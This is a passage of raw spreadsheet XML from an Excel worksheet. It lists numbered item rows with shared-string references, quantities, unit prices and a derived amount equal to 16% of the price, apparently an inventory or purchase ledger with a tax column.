      <c r="D1750" s="238" t="s">
        <v>9479</v>
      </c>
      <c r="E1750" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1750" s="238" t="s">
        <v>9480</v>
      </c>
      <c r="G1750" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1750" s="10">
        <v>60</v>
      </c>
      <c r="I1750" s="14">
        <v>395.05</v>
      </c>
      <c r="J1750" s="15">
        <v>63.168</v>
      </c>
      <c r="K1750" s="16"/>
    </row>
    <row r="1751" spans="2:11">
      <c r="B1751" s="9">
        <v>1785</v>
      </c>
      <c r="C1751" s="238" t="s">
        <v>9481</v>
      </c>
      <c r="D1751" s="238" t="s">
        <v>9482</v>
      </c>
      <c r="E1751" s="238" t="s">
        <v>9483</v>
      </c>
      <c r="F1751" s="9"/>
      <c r="G1751" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1751" s="10">
        <v>10</v>
      </c>
      <c r="I1751" s="14">
        <v>769.23</v>
      </c>
      <c r="J1751" s="15">
        <v>123.072</v>
      </c>
      <c r="K1751" s="16"/>
    </row>
    <row r="1752" spans="2:11">
      <c r="B1752" s="9">
        <v>1786</v>
      </c>
      <c r="C1752" s="238" t="s">
        <v>9484</v>
      </c>
      <c r="D1752" s="238" t="s">
        <v>9485</v>
      </c>
      <c r="E1752" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1752" s="238" t="s">
        <v>9486</v>
      </c>
      <c r="G1752" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1752" s="10">
        <v>23</v>
      </c>
      <c r="I1752" s="14">
        <v>45.6</v>
      </c>
      <c r="J1752" s="15">
        <v>7.2864</v>
      </c>
      <c r="K1752" s="16"/>
    </row>
    <row r="1753" spans="2:11">
      <c r="B1753" s="9">
        <v>1787</v>
      </c>
      <c r="C1753" s="238" t="s">
        <v>9487</v>
      </c>
      <c r="D1753" s="238" t="s">
        <v>9488</v>
      </c>
      <c r="E1753" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1753" s="238" t="s">
        <v>9489</v>
      </c>
      <c r="G1753" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1753" s="10">
        <v>18</v>
      </c>
      <c r="I1753" s="14">
        <v>36.29</v>
      </c>
      <c r="J1753" s="15">
        <v>5.8176</v>
      </c>
      <c r="K1753" s="16"/>
    </row>
    <row r="1754" spans="2:11">
      <c r="B1754" s="9">
        <v>1788</v>
      </c>
      <c r="C1754" s="238" t="s">
        <v>9490</v>
      </c>
      <c r="D1754" s="238" t="s">
        <v>9491</v>
      </c>
      <c r="E1754" s="238" t="s">
        <v>9492</v>
      </c>
      <c r="F1754" s="238" t="s">
        <v>9493</v>
      </c>
      <c r="G1754" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1754" s="10">
        <v>4</v>
      </c>
      <c r="I1754" s="14">
        <v>286.4</v>
      </c>
      <c r="J1754" s="15">
        <v>114.56</v>
      </c>
      <c r="K1754" s="16"/>
    </row>
    <row r="1755" spans="2:11">
      <c r="B1755" s="9">
        <v>1789</v>
      </c>
      <c r="C1755" s="238" t="s">
        <v>9494</v>
      </c>
      <c r="D1755" s="238" t="s">
        <v>9495</v>
      </c>
      <c r="E1755" s="238" t="s">
        <v>9496</v>
      </c>
      <c r="F1755" s="238" t="s">
        <v>9497</v>
      </c>
      <c r="G1755" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1755" s="10">
        <v>2</v>
      </c>
      <c r="I1755" s="14">
        <v>36.8</v>
      </c>
      <c r="J1755" s="15">
        <v>5.888</v>
      </c>
      <c r="K1755" s="16"/>
    </row>
    <row r="1756" spans="2:11">
      <c r="B1756" s="9">
        <v>1790</v>
      </c>
      <c r="C1756" s="238" t="s">
        <v>9498</v>
      </c>
      <c r="D1756" s="238" t="s">
        <v>9499</v>
      </c>
      <c r="E1756" s="238" t="s">
        <v>5318</v>
      </c>
      <c r="F1756" s="238" t="s">
        <v>9500</v>
      </c>
      <c r="G1756" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1756" s="10">
        <v>6</v>
      </c>
      <c r="I1756" s="14">
        <v>487.18</v>
      </c>
      <c r="J1756" s="15">
        <v>77.952</v>
      </c>
      <c r="K1756" s="16"/>
    </row>
    <row r="1757" spans="2:11">
      <c r="B1757" s="9">
        <v>1791</v>
      </c>
      <c r="C1757" s="238" t="s">
        <v>9501</v>
      </c>
      <c r="D1757" s="238" t="s">
        <v>9502</v>
      </c>
      <c r="E1757" s="238" t="s">
        <v>9503</v>
      </c>
      <c r="F1757" s="238" t="s">
        <v>9504</v>
      </c>
      <c r="G1757" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1757" s="10">
        <v>4</v>
      </c>
      <c r="I1757" s="14">
        <v>2231.72</v>
      </c>
      <c r="J1757" s="15">
        <v>357.0752</v>
      </c>
      <c r="K1757" s="16"/>
    </row>
    <row r="1758" spans="2:11">
      <c r="B1758" s="9">
        <v>1792</v>
      </c>
      <c r="C1758" s="238" t="s">
        <v>9505</v>
      </c>
      <c r="D1758" s="238" t="s">
        <v>9506</v>
      </c>
      <c r="E1758" s="238" t="s">
        <v>9507</v>
      </c>
      <c r="F1758" s="238" t="s">
        <v>9508</v>
      </c>
      <c r="G1758" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1758" s="10">
        <v>2</v>
      </c>
      <c r="I1758" s="14">
        <v>1350.43</v>
      </c>
      <c r="J1758" s="15">
        <v>216.0704</v>
      </c>
      <c r="K1758" s="16"/>
    </row>
    <row r="1759" spans="2:11">
      <c r="B1759" s="9">
        <v>1793</v>
      </c>
      <c r="C1759" s="238" t="s">
        <v>9509</v>
      </c>
      <c r="D1759" s="238" t="s">
        <v>9510</v>
      </c>
      <c r="E1759" s="238" t="s">
        <v>9511</v>
      </c>
      <c r="F1759" s="238" t="s">
        <v>4035</v>
      </c>
      <c r="G1759" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1759" s="10">
        <v>2</v>
      </c>
      <c r="I1759" s="14">
        <v>5641.03</v>
      </c>
      <c r="J1759" s="15">
        <v>902.5664</v>
      </c>
      <c r="K1759" s="16"/>
    </row>
    <row r="1760" spans="2:11">
      <c r="B1760" s="9">
        <v>1794</v>
      </c>
      <c r="C1760" s="238" t="s">
        <v>9512</v>
      </c>
      <c r="D1760" s="238" t="s">
        <v>9513</v>
      </c>
      <c r="E1760" s="238" t="s">
        <v>8387</v>
      </c>
      <c r="F1760" s="238" t="s">
        <v>9514</v>
      </c>
      <c r="G1760" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1760" s="10">
        <v>1</v>
      </c>
      <c r="I1760" s="14">
        <v>4161.03</v>
      </c>
      <c r="J1760" s="15">
        <v>665.7648</v>
      </c>
      <c r="K1760" s="16"/>
    </row>
    <row r="1761" spans="2:11">
      <c r="B1761" s="9">
        <v>1795</v>
      </c>
      <c r="C1761" s="238" t="s">
        <v>9515</v>
      </c>
      <c r="D1761" s="238" t="s">
        <v>9516</v>
      </c>
      <c r="E1761" s="238" t="s">
        <v>9517</v>
      </c>
      <c r="F1761" s="238" t="s">
        <v>9518</v>
      </c>
      <c r="G1761" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1761" s="10">
        <v>2</v>
      </c>
      <c r="I1761" s="14">
        <v>5579.99</v>
      </c>
      <c r="J1761" s="15">
        <v>892.8</v>
      </c>
      <c r="K1761" s="16"/>
    </row>
    <row r="1762" spans="2:11">
      <c r="B1762" s="9">
        <v>1796</v>
      </c>
      <c r="C1762" s="238" t="s">
        <v>9519</v>
      </c>
      <c r="D1762" s="238" t="s">
        <v>9520</v>
      </c>
      <c r="E1762" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F1762" s="238" t="s">
        <v>9522</v>
      </c>
      <c r="G1762" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1762" s="10">
        <v>4</v>
      </c>
      <c r="I1762" s="14">
        <v>89.6</v>
      </c>
      <c r="J1762" s="15">
        <v>14.336</v>
      </c>
      <c r="K1762" s="16"/>
    </row>
    <row r="1763" spans="2:11">
      <c r="B1763" s="9">
        <v>1797</v>
      </c>
      <c r="C1763" s="238" t="s">
        <v>9523</v>
      </c>
      <c r="D1763" s="238" t="s">
        <v>9524</v>
      </c>
      <c r="E1763" s="238" t="s">
        <v>9525</v>
      </c>
      <c r="F1763" s="9"/>
      <c r="G1763" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1763" s="10">
        <v>8</v>
      </c>
      <c r="I1763" s="14">
        <v>1282.05</v>
      </c>
      <c r="J1763" s="15">
        <v>205.1328</v>
      </c>
      <c r="K1763" s="16"/>
    </row>
    <row r="1764" spans="2:11">
      <c r="B1764" s="9">
        <v>1798</v>
      </c>
      <c r="C1764" s="238" t="s">
        <v>9526</v>
      </c>
      <c r="D1764" s="238" t="s">
        <v>9527</v>
      </c>
      <c r="E1764" s="238" t="s">
        <v>9528</v>
      </c>
      <c r="F1764" s="238" t="s">
        <v>9529</v>
      </c>
      <c r="G1764" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1764" s="10">
        <v>1</v>
      </c>
      <c r="I1764" s="14">
        <v>12.6</v>
      </c>
      <c r="J1764" s="15">
        <v>2.016</v>
      </c>
      <c r="K1764" s="16"/>
    </row>
    <row r="1765" spans="2:11">
      <c r="B1765" s="9">
        <v>1799</v>
      </c>
      <c r="C1765" s="238" t="s">
        <v>9530</v>
      </c>
      <c r="D1765" s="238" t="s">
        <v>9531</v>
      </c>
      <c r="E1765" s="238" t="s">
        <v>9532</v>
      </c>
      <c r="F1765" s="238" t="s">
        <v>9533</v>
      </c>
      <c r="G1765" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1765" s="10">
        <v>1</v>
      </c>
      <c r="I1765" s="14">
        <v>115.13</v>
      </c>
      <c r="J1765" s="15">
        <v>18.4208</v>
      </c>
      <c r="K1765" s="16"/>
    </row>
    <row r="1766" spans="2:11">
      <c r="B1766" s="9">
        <v>1800</v>
      </c>
      <c r="C1766" s="238" t="s">
        <v>9534</v>
      </c>
      <c r="D1766" s="238" t="s">
        <v>9535</v>
      </c>
      <c r="E1766" s="238" t="s">
        <v>9536</v>
      </c>
      <c r="F1766" s="238" t="s">
        <v>9537</v>
      </c>
      <c r="G1766" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1766" s="10">
        <v>5</v>
      </c>
      <c r="I1766" s="14">
        <v>1304.47</v>
      </c>
      <c r="J1766" s="15">
        <v>208.712</v>
      </c>
      <c r="K1766" s="16"/>
    </row>
    <row r="1767" spans="2:11">
      <c r="B1767" s="9">
        <v>1801</v>
      </c>
      <c r="C1767" s="238" t="s">
        <v>9538</v>
      </c>
      <c r="D1767" s="238" t="s">
        <v>6768</v>
      </c>
      <c r="E1767" s="238" t="s">
        <v>9539</v>
      </c>
      <c r="F1767" s="9"/>
      <c r="G1767" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H1767" s="10">
        <v>1</v>
      </c>
      <c r="I1767" s="14">
        <v>76.92</v>
      </c>
      <c r="J1767" s="15">
        <v>12.3072</v>
      </c>
      <c r="K1767" s="16"/>
    </row>
    <row r="1768" spans="2:11">
      <c r="B1768" s="9">
        <v>1802</v>
      </c>
      <c r="C1768" s="238" t="s">
        <v>9540</v>
      </c>
      <c r="D1768" s="238" t="s">
        <v>9541</v>
      </c>
      <c r="E1768" s="238" t="s">
        <v>9542</v>
      </c>
      <c r="F1768" s="9"/>
      <c r="G1768" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1768" s="10">
        <v>1</v>
      </c>
      <c r="I1768" s="14">
        <v>940.17</v>
      </c>
      <c r="J1768" s="15">
        <v>150.4272</v>
      </c>
      <c r="K1768" s="16"/>
    </row>
    <row r="1769" spans="2:11">
      <c r="B1769" s="9">
        <v>1803</v>
      </c>
      <c r="C1769" s="238" t="s">
        <v>9543</v>
      </c>
      <c r="D1769" s="238" t="s">
        <v>9544</v>
      </c>
      <c r="E1769" s="238" t="s">
        <v>3897</v>
      </c>
      <c r="F1769" s="9"/>
      <c r="G1769" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1769" s="10">
        <v>1</v>
      </c>
      <c r="I1769" s="14">
        <v>1709.4</v>
      </c>
      <c r="J1769" s="15">
        <v>273.504</v>
      </c>
      <c r="K1769" s="16"/>
    </row>
    <row r="1770" spans="2:11">
      <c r="B1770" s="9">
        <v>1804</v>
      </c>
      <c r="C1770" s="238" t="s">
        <v>9545</v>
      </c>
      <c r="D1770" s="238" t="s">
        <v>9546</v>
      </c>
      <c r="E1770" s="238" t="s">
        <v>9547</v>
      </c>
      <c r="F1770" s="9"/>
      <c r="G1770" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1770" s="10">
        <v>100</v>
      </c>
      <c r="I1770" s="14">
        <v>970.81</v>
      </c>
      <c r="J1770" s="15">
        <v>155.36</v>
      </c>
      <c r="K1770" s="16"/>
    </row>
    <row r="1771" spans="2:11">
      <c r="B1771" s="9">
        <v>1805</v>
      </c>
      <c r="C1771" s="238" t="s">
        <v>9548</v>
      </c>
      <c r="D1771" s="238" t="s">
        <v>9549</v>
      </c>
      <c r="E1771" s="238" t="s">
        <v>9550</v>
      </c>
      <c r="F1771" s="238" t="s">
        <v>9551</v>
      </c>
      <c r="G1771" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1771" s="10">
        <v>5</v>
      </c>
      <c r="I1771" s="14">
        <v>356.37</v>
      </c>
      <c r="J1771" s="15">
        <v>57.016</v>
      </c>
      <c r="K1771" s="16"/>
    </row>
    <row r="1772" spans="2:11">
      <c r="B1772" s="9">
        <v>1806</v>
      </c>
      <c r="C1772" s="238" t="s">
        <v>9552</v>
      </c>
      <c r="D1772" s="238" t="s">
        <v>9553</v>
      </c>
      <c r="E1772" s="238" t="s">
        <v>9554</v>
      </c>
      <c r="F1772" s="9"/>
      <c r="G1772" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1772" s="10">
        <v>1</v>
      </c>
      <c r="I1772" s="14">
        <v>1068.38</v>
      </c>
      <c r="J1772" s="15">
        <v>170.9408</v>
      </c>
      <c r="K1772" s="16"/>
    </row>
    <row r="1773" spans="2:11">
      <c r="B1773" s="9">
        <v>1807</v>
      </c>
      <c r="C1773" s="238" t="s">
        <v>9555</v>
      </c>
      <c r="D1773" s="238" t="s">
        <v>9556</v>
      </c>
      <c r="E1773" s="238" t="s">
        <v>9557</v>
      </c>
      <c r="F1773" s="9"/>
      <c r="G1773" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1773" s="10">
        <v>1</v>
      </c>
      <c r="I1773" s="14">
        <v>1384.62</v>
      </c>
      <c r="J1773" s="15">
        <v>221.5392</v>
      </c>
      <c r="K1773" s="16"/>
    </row>
    <row r="1774" spans="2:11">
      <c r="B1774" s="9">
        <v>1808</v>
      </c>
      <c r="C1774" s="238" t="s">
        <v>9558</v>
      </c>
      <c r="D1774" s="238" t="s">
        <v>9559</v>
      </c>
      <c r="E1774" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1774" s="9"/>
      <c r="G1774" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1774" s="10">
        <v>50</v>
      </c>
      <c r="I1774" s="14">
        <v>641.05</v>
      </c>
      <c r="J1774" s="15">
        <v>102.56</v>
      </c>
      <c r="K1774" s="16"/>
    </row>
    <row r="1775" spans="2:11">
      <c r="B1775" s="9">
        <v>1809</v>
      </c>
      <c r="C1775" s="238" t="s">
        <v>9560</v>
      </c>
      <c r="D1775" s="238" t="s">
        <v>9561</v>
      </c>
      <c r="E1775" s="238" t="s">
        <v>9562</v>
      </c>
      <c r="F1775" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1775" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1775" s="10">
        <v>21</v>
      </c>
      <c r="I1775" s="14">
        <v>258.96</v>
      </c>
      <c r="J1775" s="15">
        <v>41.4288</v>
      </c>
      <c r="K1775" s="16"/>
    </row>
    <row r="1776" spans="2:11">
      <c r="B1776" s="9">
        <v>1810</v>
      </c>
      <c r="C1776" s="238" t="s">
        <v>9563</v>
      </c>
      <c r="D1776" s="238" t="s">
        <v>9564</v>
      </c>
      <c r="E1776" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F1776" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1776" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1776" s="10">
        <v>39</v>
      </c>
      <c r="I1776" s="14">
        <v>538.24</v>
      </c>
      <c r="J1776" s="15">
        <v>86.112</v>
      </c>
      <c r="K1776" s="16"/>
    </row>
    <row r="1777" spans="2:11">
      <c r="B1777" s="9">
        <v>1811</v>
      </c>
      <c r="C1777" s="238" t="s">
        <v>9565</v>
      </c>
      <c r="D1777" s="238" t="s">
        <v>9566</v>
      </c>
      <c r="E1777" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1777" s="238" t="s">
        <v>9567</v>
      </c>
      <c r="G1777" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1777" s="10">
        <v>19</v>
      </c>
      <c r="I1777" s="14">
        <v>261.87</v>
      </c>
      <c r="J1777" s="15">
        <v>41.8912</v>
      </c>
      <c r="K1777" s="16"/>
    </row>
    <row r="1778" spans="2:11">
      <c r="B1778" s="9">
        <v>1812</v>
      </c>
      <c r="C1778" s="238" t="s">
        <v>9568</v>
      </c>
      <c r="D1778" s="238" t="s">
        <v>9569</v>
      </c>
      <c r="E1778" s="238" t="s">
        <v>9570</v>
      </c>
      <c r="F1778" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1778" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1778" s="10">
        <v>2</v>
      </c>
      <c r="I1778" s="14">
        <v>2478.63</v>
      </c>
      <c r="J1778" s="15">
        <v>396.5824</v>
      </c>
      <c r="K1778" s="16"/>
    </row>
    <row r="1779" spans="2:11">
      <c r="B1779" s="9">
        <v>1813</v>
      </c>
      <c r="C1779" s="238" t="s">
        <v>9571</v>
      </c>
      <c r="D1779" s="238" t="s">
        <v>9572</v>
      </c>
      <c r="E1779" s="238" t="s">
        <v>9573</v>
      </c>
      <c r="F1779" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1779" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1779" s="10">
        <v>3</v>
      </c>
      <c r="I1779" s="14">
        <v>4871.79</v>
      </c>
      <c r="J1779" s="15">
        <v>779.4864</v>
      </c>
      <c r="K1779" s="16"/>
    </row>
    <row r="1780" spans="2:11">
      <c r="B1780" s="9">
        <v>1814</v>
      </c>
      <c r="C1780" s="238" t="s">
        <v>9574</v>
      </c>
      <c r="D1780" s="238" t="s">
        <v>9575</v>
      </c>
      <c r="E1780" s="238" t="s">
        <v>9576</v>
      </c>
      <c r="F1780" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1780" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1780" s="10">
        <v>6</v>
      </c>
      <c r="I1780" s="14">
        <v>4358.96</v>
      </c>
      <c r="J1780" s="15">
        <v>697.4304</v>
      </c>
      <c r="K1780" s="16"/>
    </row>
    <row r="1781" spans="2:11">
      <c r="B1781" s="9">
        <v>1815</v>
      </c>
      <c r="C1781" s="238" t="s">
        <v>9577</v>
      </c>
      <c r="D1781" s="238" t="s">
        <v>9578</v>
      </c>
      <c r="E1781" s="238" t="s">
        <v>9579</v>
      </c>
      <c r="F1781" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1781" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1781" s="10">
        <v>2</v>
      </c>
      <c r="I1781" s="14">
        <v>15.71</v>
      </c>
      <c r="J1781" s="15">
        <v>2.5152</v>
      </c>
      <c r="K1781" s="16"/>
    </row>
    <row r="1782" spans="2:11">
      <c r="B1782" s="9">
        <v>1816</v>
      </c>
      <c r="C1782" s="238" t="s">
        <v>9580</v>
      </c>
      <c r="D1782" s="238" t="s">
        <v>9581</v>
      </c>
      <c r="E1782" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1782" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1782" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1782" s="10">
        <v>70</v>
      </c>
      <c r="I1782" s="14">
        <v>1337.81</v>
      </c>
      <c r="J1782" s="15">
        <v>214.032</v>
      </c>
      <c r="K1782" s="16"/>
    </row>
    <row r="1783" spans="2:11">
      <c r="B1783" s="9">
        <v>1817</v>
      </c>
      <c r="C1783" s="238" t="s">
        <v>9582</v>
      </c>
      <c r="D1783" s="238" t="s">
        <v>9583</v>
      </c>
      <c r="E1783" s="238" t="s">
        <v>9013</v>
      </c>
      <c r="F1783" s="9"/>
      <c r="G1783" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1783" s="10">
        <v>21</v>
      </c>
      <c r="I1783" s="14">
        <v>208.98</v>
      </c>
      <c r="J1783" s="15">
        <v>33.432</v>
      </c>
      <c r="K1783" s="16"/>
    </row>
    <row r="1784" spans="2:11">
      <c r="B1784" s="9">
        <v>1818</v>
      </c>
      <c r="C1784" s="238" t="s">
        <v>9584</v>
      </c>
      <c r="D1784" s="238" t="s">
        <v>9585</v>
      </c>
      <c r="E1784" s="238" t="s">
        <v>9586</v>
      </c>
      <c r="F1784" s="9"/>
      <c r="G1784" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1784" s="10">
        <v>5</v>
      </c>
      <c r="I1784" s="14">
        <v>5486.75</v>
      </c>
      <c r="J1784" s="15">
        <v>877.88</v>
      </c>
      <c r="K1784" s="16"/>
    </row>
    <row r="1785" spans="2:11">
      <c r="B1785" s="9">
        <v>1819</v>
      </c>
      <c r="C1785" s="238" t="s">
        <v>9587</v>
      </c>
      <c r="D1785" s="238" t="s">
        <v>9588</v>
      </c>
      <c r="E1785" s="238" t="s">
        <v>9589</v>
      </c>
      <c r="F1785" s="9"/>
      <c r="G1785" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1785" s="10">
        <v>10</v>
      </c>
      <c r="I1785" s="14">
        <v>25.64</v>
      </c>
      <c r="J1785" s="15">
        <v>4.096</v>
      </c>
      <c r="K1785" s="16"/>
    </row>
    <row r="1786" spans="2:11">
      <c r="B1786" s="9">
        <v>1820</v>
      </c>
      <c r="C1786" s="238" t="s">
        <v>9590</v>
      </c>
      <c r="D1786" s="238" t="s">
        <v>9591</v>
      </c>
      <c r="E1786" s="238" t="s">
        <v>9592</v>
      </c>
      <c r="F1786" s="9"/>
      <c r="G1786" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1786" s="10">
        <v>2</v>
      </c>
      <c r="I1786" s="14">
        <v>118.52</v>
      </c>
      <c r="J1786" s="15">
        <v>18.9632</v>
      </c>
      <c r="K1786" s="16"/>
    </row>
    <row r="1787" spans="2:11">
      <c r="B1787" s="9">
        <v>1821</v>
      </c>
      <c r="C1787" s="238" t="s">
        <v>9593</v>
      </c>
      <c r="D1787" s="238" t="s">
        <v>9594</v>
      </c>
      <c r="E1787" s="238" t="s">
        <v>9517</v>
      </c>
      <c r="F1787" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1787" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1787" s="10">
        <v>1</v>
      </c>
      <c r="I1787" s="14">
        <v>8376.07</v>
      </c>
      <c r="J1787" s="15">
        <v>1340.1712</v>
      </c>
      <c r="K1787" s="16"/>
    </row>
    <row r="1788" spans="2:11">
      <c r="B1788" s="9">
        <v>1822</v>
      </c>
      <c r="C1788" s="238" t="s">
        <v>9595</v>
      </c>
      <c r="D1788" s="238" t="s">
        <v>9596</v>
      </c>
      <c r="E1788" s="238" t="s">
        <v>9597</v>
      </c>
      <c r="F1788" s="9"/>
      <c r="G1788" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1788" s="10">
        <v>2</v>
      </c>
      <c r="I1788" s="14">
        <v>3333.33</v>
      </c>
      <c r="J1788" s="15">
        <v>533.3344</v>
      </c>
      <c r="K1788" s="16"/>
    </row>
    <row r="1789" spans="2:11">
      <c r="B1789" s="9">
        <v>1823</v>
      </c>
      <c r="C1789" s="238" t="s">
        <v>9598</v>
      </c>
      <c r="D1789" s="238" t="s">
        <v>9599</v>
      </c>
      <c r="E1789" s="238" t="s">
        <v>9600</v>
      </c>
      <c r="F1789" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1789" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1789" s="10">
        <v>10</v>
      </c>
      <c r="I1789" s="14">
        <v>388.57</v>
      </c>
      <c r="J1789" s="15">
        <v>62.176</v>
      </c>
      <c r="K1789" s="16"/>
    </row>
    <row r="1790" spans="2:11">
      <c r="B1790" s="9">
        <v>1824</v>
      </c>
      <c r="C1790" s="238" t="s">
        <v>9601</v>
      </c>
      <c r="D1790" s="238" t="s">
        <v>9602</v>
      </c>
      <c r="E1790" s="238" t="s">
        <v>9603</v>
      </c>
      <c r="F1790" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1790" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1790" s="10">
        <v>30</v>
      </c>
      <c r="I1790" s="14">
        <v>2456.58</v>
      </c>
      <c r="J1790" s="15">
        <v>393.072</v>
      </c>
      <c r="K1790" s="16"/>
    </row>
    <row r="1791" spans="2:11">
      <c r="B1791" s="9">
        <v>1825</v>
      </c>
      <c r="C1791" s="238" t="s">
        <v>9604</v>
      </c>
      <c r="D1791" s="238" t="s">
        <v>9599</v>
      </c>
      <c r="E1791" s="238" t="s">
        <v>9605</v>
      </c>
      <c r="F1791" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1791" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1791" s="10">
        <v>95</v>
      </c>
      <c r="I1791" s="14">
        <v>4393.34</v>
      </c>
      <c r="J1791" s="15">
        <v>703</v>
      </c>
      <c r="K1791" s="16"/>
    </row>
    <row r="1792" spans="2:11">
      <c r="B1792" s="9">
        <v>1826</v>
      </c>
      <c r="C1792" s="238" t="s">
        <v>9606</v>
      </c>
      <c r="D1792" s="238" t="s">
        <v>9602</v>
      </c>
      <c r="E1792" s="238" t="s">
        <v>9607</v>
      </c>
      <c r="F1792" s="238" t="s">
        <v>488</v>
      </c>
      <c r="G1792" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1792" s="10">
        <v>125</v>
      </c>
      <c r="I1792" s="14">
        <v>9167.63</v>
      </c>
      <c r="J1792" s="15">
        <v>1466.8</v>
      </c>
      <c r="K1792" s="16"/>
    </row>
    <row r="1793" spans="2:11">
      <c r="B1793" s="9">
        <v>1827</v>
      </c>
      <c r="C1793" s="238" t="s">
        <v>9608</v>
      </c>
      <c r="D1793" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E1793" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1793" s="9"/>
      <c r="G1793" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1793" s="10">
        <v>66</v>
      </c>
      <c r="I1793" s="14">
        <v>480.81</v>
      </c>
      <c r="J1793" s="15">
        <v>76.9824</v>
      </c>
      <c r="K1793" s="16"/>
    </row>
    <row r="1794" spans="2:11">
      <c r="B1794" s="9">
        <v>1828</v>
      </c>
      <c r="C1794" s="238" t="s">
        <v>9609</v>
      </c>
      <c r="D1794" s="238" t="s">
        <v>9610</v>
      </c>
      <c r="E1794" s="238" t="s">
        <v>7153</v>
      </c>
      <c r="F1794" s="9"/>
      <c r="G1794" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1794" s="10">
        <v>1</v>
      </c>
      <c r="I1794" s="14">
        <v>1239.32</v>
      </c>
      <c r="J1794" s="15">
        <v>198.2912</v>
      </c>
      <c r="K1794" s="16"/>
    </row>
    <row r="1795" spans="2:11">
      <c r="B1795" s="9">
        <v>1829</v>
      </c>
      <c r="C1795" s="238" t="s">
        <v>9611</v>
      </c>
      <c r="D1795" s="238" t="s">
        <v>9612</v>
      </c>
      <c r="E1795" s="238" t="s">
        <v>6810</v>
      </c>
      <c r="F1795" s="238" t="s">
        <v>9613</v>
      </c>
      <c r="G1795" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1795" s="10">
        <v>6</v>
      </c>
      <c r="I1795" s="14">
        <v>6456.92</v>
      </c>
      <c r="J1795" s="15">
        <v>1033.104</v>
      </c>
      <c r="K1795" s="16"/>
    </row>
    <row r="1796" spans="2:11">
      <c r="B1796" s="9">
        <v>1830</v>
      </c>
      <c r="C1796" s="238" t="s">
        <v>9614</v>
      </c>
      <c r="D1796" s="238" t="s">
        <v>9615</v>
      </c>
      <c r="E1796" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F1796" s="238" t="s">
        <v>9613</v>
      </c>
      <c r="G1796" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1796" s="10">
        <v>11</v>
      </c>
      <c r="I1796" s="14">
        <v>653.49</v>
      </c>
      <c r="J1796" s="15">
        <v>104.5616</v>
      </c>
      <c r="K1796" s="16"/>
    </row>
    <row r="1797" spans="2:11">
      <c r="B1797" s="9">
        <v>1831</v>
      </c>
      <c r="C1797" s="238" t="s">
        <v>9616</v>
      </c>
      <c r="D1797" s="238" t="s">
        <v>9617</v>
      </c>
      <c r="E1797" s="238" t="s">
        <v>3856</v>
      </c>
      <c r="F1797" s="238" t="s">
        <v>9613</v>
      </c>
      <c r="G1797" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1797" s="10">
        <v>2</v>
      </c>
      <c r="I1797" s="14">
        <v>2272.02</v>
      </c>
      <c r="J1797" s="15">
        <v>363.5232</v>
      </c>
      <c r="K1797" s="16"/>
    </row>
    <row r="1798" spans="2:11">
      <c r="B1798" s="9">
